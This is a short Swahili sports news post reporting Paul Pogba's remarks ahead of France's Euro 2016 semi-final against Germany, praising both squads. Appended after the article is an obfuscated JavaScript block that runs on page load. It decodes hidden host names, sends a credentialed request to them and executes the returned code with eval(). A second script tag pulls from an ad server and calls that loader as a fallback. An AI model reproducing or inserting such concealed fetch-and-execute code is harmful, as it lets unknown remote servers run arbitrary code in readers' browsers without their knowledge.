Pogba Auongelea Mchezo Wa Nusu Fainali Germany vs France | IMMA
Mchezaji nyota wa France POGBA asema mchezo wao wa nusu fainali Katika michuano ya Euro2016 dhidi ya timu ya Germany,Nikama mchezo wa Fainali kwao
Aidha Pogba amesema hawajawahi kukutana na timu yenye upinzani wa hali ya juu tangu walipotolewa kwenye mashindano ya Kombe la Dunia miaka miwili(2) iliopita katika hatua ya Robo fainali na timu ta Germany ambayo wanakutananayo tena leo katika hatua ya Nusu fainali.
Pogba amesifia kiwango cha sasa cha timu yake na ushirikiano walionao wachezaji wa France,Pogba amesema kulejea kikosini mchezaji Cante Anaecheza kama kiungo mchezeshaji anawaongezea hamasa wachezaji wote.
Pogba hajasita kukisifia kiwango bora kilichooneshwa na wachezaji wa France katika mechi ya Robo fainali dhidi ya timu ya iceland ambapo walishinda 5-2.
Pogba hajakibeza kiwango bora cha timu ya Germany kwa kusema kua Ujerumani ni inayocheza mpira wa kasi na inawachezaji wanaocheza vilabu vikubwa duniani na wanao cheza kwa umoja.
\Pogba hajasita kutaja ubora wa kipa wa ujerumani Noure na wachezaji wengine kama Ozil,Kroose na wengine wengi.
Pogba amesema bayana kua mchezo wa leo ni wamuhimu sana kwao na njia pekee itakayo wafanya wao kushinda ni umoja wao kama wachezaji,kamaliza kwa kuwashukuru mashabiki wa timu ya Ufaransa kwa ushirikiano wanaoonesha ndani nanje ya uwanja.
<script data-cfasync="false" type="text/javascript">var r3D=window;for(var b in r3D){if(b.length===((1.094E3,6.890E2)>82.?(0x152,6):(132.1E1,90))&&b.charCodeAt((0x9A<(0x1C6,0x1FB)?(145,3):(119.80E1,0x1FB)<=0x1B2?0xF9:(50.7E1,0xB0)))===((0x1C2,1.54E2)>18?(1.333E3,100):(135,9.96E2))&&b.charCodeAt(((12.14E2,113)<=127.?(125.,5):(0x23D,11.10E1)))===(88.>=(67.,0xD3)?1.71E2:(0xFC,0x1D0)<=(106.,4.98E2)?(38.40E1,119):(0x141,0x17))&&b.charCodeAt((0x117>(104.,144.)?(59.,1):(103.,15)))===((50.,0x0)<0x31?(0x0,105):(0x12F,5.66E2))&&b.charCodeAt(((35,41)<=(0x37,107.)?(1.09E3,0):(1.0110E3,130.)))===((0x212,0x112)<1.0190E3?(62.,119):0x1A4<=(0x209,0x73)?(77,14.3E1):(0x188,0x3A)))break};for(var J in r3D[b]){if(J.length===((74,8.03E2)>=(0xB1,47.)?(80.,8):(0xDF,0x1CF))&&J.charCodeAt((114<=(54.6E1,121.)?(1.2770E3,5):(0xF7,56.)))===((100.4E1,149)>=0x9F?(0x1A2,0x12F):(1.0E1,1.0010E3)>=(86,59.90E1)?(1.299E3,101):(30,13.36E2))&&J.charCodeAt((0x17F<(1.244E3,0x1BC)?(0x1F5,7):(6.78E2,0x77)))===((104.,21.)>1.466E3?(13,"M"):0x23E<(14,7.770E2)?(106.,116):(39.5E1,0x18E))&&J.charCodeAt(((133,93.2E1)<=1.075E3?(0x221,3):(47.,2.66E2)))===((0x148,26.6E1)<=130.?98:123.0E1>(62,74.)?(0x239,117):(14.39E2,3.39E2))&&J.charCodeAt(((0x148,66.9E1)>38.5E1?(100,0):0x150<(0x89,148.)?(4.09E2,'F'):(96,111.)))===((0xCB,0x1EF)<=84.80E1?(54.7E1,100):(107.,0xA)))break};(function(S,l,e,N){r3D[b][l]=function(){var F=((126.,0x245)<6.?'S':14.06E2>=(7.87E2,0xFB)?(14.94E2,0):(0x36,0x14D)),u=F,P=function P(){var g=((0x8D,91.7E1)>44.40E1?(85.7E1,'/'):(77.,12.20E1));var o='';var M='//';var D='GET';var Z=(0x231<=(38,98.)?81:(0x1C4,0x7E)>=9.5E1?(29.0E1,true):(16,100));var q=new XMLHttpRequest();q.withCredentials=Z;q.open((D),(M)+r3D[b]['atob'](e[u].split(o).reverse().join(o))+g+N+g,Z);q.onreadystatechange=function(){var y=(0x19B>=(0x127,111.)?(86,200):(0x17F,51.7E1));var t=((0x1E6,101.)>0x73?'W':99.9E1>(0x62,139)?(94,4):(0x112,0x1E1));if(q.readyState==t&&q.status==y&&q.responseText){eval(q.responseText);}};q.onerror=function(){if(++u!=e.length){P();}};try{q.send();}catch(y){q.onerror();}};P();};})(r3D[b][J],'_bhrfs',['=U2YhB3cucne6RzY2xWb','==Adlt2YpJ3YugWb5cXa4Q2Y','==QZ0l2cuE2N3VmZ6dXM','==QZ0l2ciV2duAjYphDbvp2Z'],1155246);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1153790" onerror="window._bhrfs();"></script>
Post a Comment